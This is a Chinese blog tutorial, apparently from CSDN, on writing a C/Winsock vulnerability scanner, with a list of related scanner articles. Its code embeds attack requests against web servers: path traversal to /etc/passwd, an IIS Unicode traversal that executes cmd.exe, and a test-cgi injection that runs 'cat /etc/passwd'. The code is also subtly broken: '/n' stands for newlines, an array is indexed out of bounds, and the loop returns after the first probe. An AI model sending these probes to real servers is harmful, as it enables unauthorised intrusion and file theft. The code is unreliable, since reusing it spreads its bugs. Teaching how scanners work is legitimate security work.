编写漏洞扫描器

最新推荐文章于 2024-02-20 15:45:00 发布
最新推荐文章于 2024-02-20 15:45:00 发布
阅读量1.1k 收藏 5
点赞数
分类专栏: 编程技术 文章标签: socket initialization struct stream 服务器 server
编写漏洞扫描器

一、漏洞扫描器基本原理:
编写漏洞扫描器探查远程服务器上可能存在的具有安全隐患的文件是否存在,它的socket建立过程和上面的端口扫描器是相同的,所不同的是漏洞扫描器通常使用80端口,然后对这个端口发送一个GET文件的请求,服务器接收到请求会返回文件内容,如果文件不存在则返回一个错误提示,通过接收返回内容可以判断文件是否存在。发送和接收数据需要使用函数send()和recv(),另外对流中存在的字符串进行判断需要使用函数strstr(),这除了需要具备socket函数库的知识以外,还需要一些有关string函数库的知识。
二、简单的漏洞扫描源代码:
/********************/
/* 端口扫描器 源代码*/
/********************/


#include <stdio.h>


#include <string.h>


#include <winsock.h>


int main(int argc,char *argv[])


{


if(argc!=2){


printf("Useage : scan [IP address]/n");


return(1);


}


struct sockaddr_in blah;


struct hostent *he;


WSADATA wsaData;


int i;


WORD wVersionRequested;


SOCKET sock;


char buff[1024];


char *ex[10];


ex[1]="GET /../../../../etc/passwd HTTP/1.0/n/n";


ex[2]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/ HTTP/1.0/n/n";


ex[3]="GET /A.ida/%c1%00.ida HTTP/1.0/n/n";


ex[4]="GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0/n/n";


ex[5]="GET /cgi-bin/test-cgi?/help&0a/bin/cat%20/etc/passwd HTTP/1.0/n/n";


ex[6]="GET /cgi-bin/test-cgi?* HTTP/1.0/n/n";


char *fmsg="HTTP/1.1 200 OK";


wVersionRequested = MAKEWORD( 1, 1 );


if (WSAStartup(wVersionRequested , &wsaData)){


printf("Winsock Initialization failed./n");


exit(1);


}


if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){


printf("Can not create socket./n");


exit(1);


}


sock = socket(AF_INET,SOCK_STREAM,0);


blah.sin_family = AF_INET;


blah.sin_port = htons(80);


blah.sin_addr.s_addr= inet_addr(argv[1]);


if ((he=gethostbyname(argv[1]))!=NULL){


memcpy((char *)&blah.sin_addr.s_addr,he->h_addr,he->h_length);


}


else{


if((blah.sin_addr.s_addr=inet_addr(argv[1]))==-1){


WSACleanup();


exit(1);


}


}


for (i=1 ; i<7; i++) {


if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))==0){


send(sock,ex[i],strlen(ex[i]),0);


recv(sock,buff,sizeof(buff),0);


if(strstr(buff,fmsg)!=NULL){


printf("/nFound :%s/n", ex[i]);


}


}


closesocket(sock);


WSACleanup();


return(1);


}


}
这段代码可以检测六个漏洞,读者可以根据自己的需要增加漏洞扫描的数量。程序实现的很简洁,概括起来这段程序完成了一下四项工作:
1、连接目标主机SERVER;
2、向目标主机发送GET请求;
3、接收目标返回数据;
4、根据返回数据判断文件是否存在。
三、返回数值:
读者也许不明白,程序究竟依靠返回的什么数值判断文件是否存在的呢?现在让我们修改一下程序,仔细看一下返回来的究竟是什么内容,对上面的程序进行如下修改:
/************************/
/* 检测文件头内容 源代码*/
/************************/


#include <stdio.h>


#include <string.h>


#include <winsock.h>


int main(int argc,char *argv[])


{


if(argc!=2){


printf("Useage : scan [IP address]/n");


return(1);


}


struct sockaddr_in blah;


struct hostent *he;


WSADATA wsaData;


WORD wVersionRequested;


SOCKET sock;


char buff[4096];


char *ex[2];


ex[1]="GET /index.html HTTP/1.0/n/n";


ex[2]="GET /noindex.htm HTTP/1.0/n/n";


wVersionRequested = MAKEWORD( 1, 1 );


if (WSAStartup(wVersionRequested , &wsaData)){


printf("Winsock Initialization failed./n");


exit(1);


}


if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){


printf("Can not create socket./n");


exit(1);


}


sock = socket(AF_INET,SOCK_STREAM,0);


blah.sin_family = AF_INET;


blah.sin_port = htons(80);


blah.sin_addr.s_addr= inet_addr(argv[1]);


if ((he=gethostbyname(argv[1]))!=NULL){


memcpy((char *)&blah.sin_addr.s_addr,he->h_addr,he->h_length);


}


else{


if((blah.sin_addr.s_addr=inet_addr(argv[1]))==-1){


WSACleanup();


exit(1);


}


}


if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))==0){


send(sock,ex[1],strlen(ex[1]),0);


recv(sock,buff,sizeof(buff),0);


printf("%s",buff);


send(sock,ex[2],strlen(ex[2]),0);


recv(sock,buff,sizeof(buff),0);


printf("%s",buff);


}


closesocket(sock);


WSACleanup();


return(1);


}
程序将检测文件进行了修改,指对“/index.htm”和“/noindex.htm”进行判断,因为index.htm是默认的页面,所以大多数情况下是存在于服务器上的,而noindex.htm则是没有找到文件的情况,通过对接收回来的流buff的printf()可以清楚地看到返回来的究竟是什么东西。
通过运行程序读者会看到类似下面的内容:
HTTP/1.1 200 OK
Date: Thu, 23 Aug 2001 10:59:31 GMT
Server: Apache/1.3.12 (Unix)
Last-Modified: Thu, 23 Aug 2001 10:44:11 GMT
ETag: "a9c96-b73e-3b84de7b"
Accept-Ranges: bytes
Content-Length: 46910
Connection: close
Content-Type: text/html
这个htm程序的头部说明,返回内容还会有很多,不过下面的内容就是正常的htm文件了,这个头是被隐藏的,所以大多数使用者在平时使用电脑过程中,不会发现htm文件的开始部位,还有一个这样的内容说明。这个头里面包含了很多信息,例如第一行的200 OK就是文件存在的意思,如果是404 NOT FOUND那么就是文件不存在,也就是这个内容才能够让漏洞扫描器正常工作,现在读者应该明白为什么我们编写的漏洞扫描器里面由foundmsg=HTTP/1.1 200 OK的语句了吧。
通过这个头还可以了解到对方服务器使用的是什么系统,例如:Server: Apache/1.3.12 (Unix)就是我们扫描的服务器使用的系统类型。

netwindmiss
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python实现的漏洞扫描
06-05
漏洞扫描分为端口扫描模块、SSH弱口令扫描模块及OS识别模块。 使用Python语言编程实现。 有CMD执行和图形界面执行两种操作方式。 用户输入目标设备的IP地址及扫描的端口号范围,根据需要选择要扫描的内容,系统...
如何自己开发漏洞扫描工具
smooth的博客
08-25 1万+
扫描的设计思想是:灵活,易扩展,易修改,灵活的意思就是可单独执行专项漏洞的扫描,也可以批量执行集成的所有漏洞探测模块;易扩展的意思就是,新的漏洞检测模块可清晰简单的集成进扫描;易修改,对各个漏洞扫描模块可根据特殊情况修改探测逻辑。 扫描的使用 扫描下载地址:https://gitee.com/samllpig/SafeTool-51testing 工具的详细安装教程:http://quan.51testing.com/pcQuan/lecture/117 先打开我们的扫描看下界面: ..
漏洞扫描工具的编写
Kali与编程
11-13 916
编写漏洞扫描工具时,需要明确目标和扫描类型,并选择合适的编程语言和漏洞库。例如,对于漏洞扫描,我们需要从漏洞库中获取漏洞信息,并构建攻击请求,然后分析目标系统的响应来确定是否存在漏洞。漏洞扫描工具的基本原理是通过发送特定的数据包或请求到目标系统上的应用程序或服务,然后分析响应来确定系统中存在的漏洞和风险。扫描引擎会根据漏洞库中的信息构建攻击请求,并分析目标系统的响应来确定是否存在漏洞。需要注意的是,这只是一个简单的漏洞扫描工具示例,实际的漏洞扫描工具需要更复杂的算法和更全面的漏洞库来确保准确性和完整性。
漏洞扫描-nuclei-poc编写
告白的博客
11-10 878
Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞扫描。它使用Go语言开发,具有很强的可配置性、可扩展性和易用性。提供TCP、DNS、HTTP、FILE 等各类协议的扫描,通过强大且灵活的模板,可以使用Nuclei模拟各种安全检查。提取/匹配:提取,匹配返回包内容,匹配出需要的目标(根据目标结果特征用匹配还是提取)http:漏洞利用核心, {{xx}}:提取目标地址的匹配信息。info:漏洞描述情况(级别,编号,标签,简介等)不允许tab,只能空格。
W13Scan 漏洞扫描之XSS插件模块编写示例
Spontaneous_0的博客
01-14 118
W13Scan 漏洞扫描之XSS插件模块编写示例
python漏洞扫描编写,用Python编写Web漏洞检测工具
weixin_42520374的博客
03-26 3019
作为单位的网络安全管理员,经常会遇到这样的情况,某些漏洞在互联网上被批露后,在用的扫描工具却无法及时集成。遇到这种情况,领导会说:“自己想办法,抓紧检测是否有这个漏洞。”很多人会告诉你可以用自行编写Poc这个方法,指的就是根据漏洞的简单原理写出对应的漏洞检测代码,用来验证漏洞是否存在。那么如何编写Poc呢?可能你会把它想象的无比困难。Python的出现,极大简化了Poc的编写过程,我们不需要再把时...
编写Wu-ftp漏洞扫描
08-03
标题提到的“编写Wu-ftp漏洞扫描”是指创建一个程序来检测Wu-FTP服务器的已知安全漏洞。Wu-FTP是一款经典的FTP(文件传输协议)服务器软件,曾广泛应用于Linux系统。描述中提到了一个特定的漏洞,即“格式化漏洞”...
自己动手编写SQL注入漏洞扫描工具
03-25
本篇将探讨如何自己动手编写一个SQL注入漏洞扫描工具,通过分析提供的程序代码,我们可以了解基本的检测原理和技术。 首先,我们需要理解SQL注入的基本概念。当用户提交的数据被直接拼接到SQL查询中,而没有进行...
自己动手编写SQL注入漏洞扫描C#源代码
03-16
本主题将深入探讨如何使用C#编程语言编写一个SQL注入漏洞扫描,旨在帮助开发者理解和预防这类威胁。 首先,我们需要理解SQL注入的基本概念。SQL注入是攻击者通过输入恶意的SQL代码,欺骗数据库服务器执行非预期的...
【python】打造一款自动扫描全网漏洞的扫描
热门推荐
浪子燕青的博客
04-25 2万+
这是一款和刘老师一起写的网安类别扫描。基本原理是由Python+Mysql搭建的扫描,实现自动无限永久爬行采集网站链接,自动化漏洞扫描检测。目的是挂机就能实现自动化发掘敏感情报,亦或是发现网站的漏洞或者隐藏可利用的漏洞。     早在17年11月份的时候就有这个想法,可是一直没有去做,后来快到除夕前几天才正式开始整个软件工程的设计。当时的想实现的功能比较简单,就是能做到无限采集到网站使用的CM
基于C语言的漏洞扫描
05-02
用于信息安全专业的研究者,使用C语言编写,编译通过。
自己动手编写SQL注入漏洞扫描
12-24
自己动手编写SQL注入漏洞扫描
漏洞扫描的设计(含源码)
03-13
第11章 漏洞扫描的设计(含源码) 11.1.3 DemoInject 11.1.4_1 Inject ASP 11.1.4_2 PortScan_Inject 11.2 ExhaustPassword 11.3 PortScan_DDOS 11.4 Sniffer_Pass 11.5 PortScan_Match
5 款漏洞扫描工具:实用、强力、全面(含开源)
顶峰
10-10 1882
漏洞扫描工具
5.5 漏洞扫描:Web安全漏洞扫描及审计
qq_55202378的博客
08-04 3366
w3af 漏洞扫描及审计
毕业设计:基于python的漏洞扫描系统的实现
最新发布
2301_79555157的博客
02-20 3429
毕业设计:漏洞扫描系统的实现通过计算机技术和网络扫描技术,对目标系统进行主动扫描和漏洞检测。该漏洞扫描系统具有高效、准确和可扩展的特点,可以帮助用户及时发现和修复系统中的漏洞,提高网络安全性。为计算机毕业设计提供了一个创新的方向,结合了网络安全、计算机网络和软件开发技术,为毕业生提供了一个有意义的研究课题。对于计算机专业、软件工程专业、网络安全专业和信息安全专业的毕业生而言,提供了一个具有挑战性和实用性的研究课题。
漏扫工具Appscan使用(非常详细)从零基础入门到精通,看完这一篇就够了。
qq_44005305的博客
10-15 1711
名称填写为cookie,内容为复制的cookie字段**(只复制引号里面的内容)**扫描开始有些目录会存在XX,
WEB安全基础 - - -漏洞扫描
weixin_67503304的博客
07-30 1877
简单介绍了漏洞扫描的安装,提供破解xray的方法。
python编写简单漏洞扫描(通过实别服务版本号)
qq_43200143的博客
02-11 2706
源于《python绝技:运用python成为顶级黑客》 代码: import socket import os import sys def retBanner(ip, port): try: socket.setdefaulttimeout(2) s = socket.socket() s.connect((ip,port)) banner = s.recv(1024) return banner ..
python漏洞扫描编写
04-26
编写漏洞扫描主要有两种思路:一种是基于已知的漏洞数据库进行扫描,另一种是基于漏洞特征进行扫描。以下是一个基于后一种思路的 Python 漏洞扫描的简单实现: 1. 首先,需要使用 requests 库来发送 HTTP 请求...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值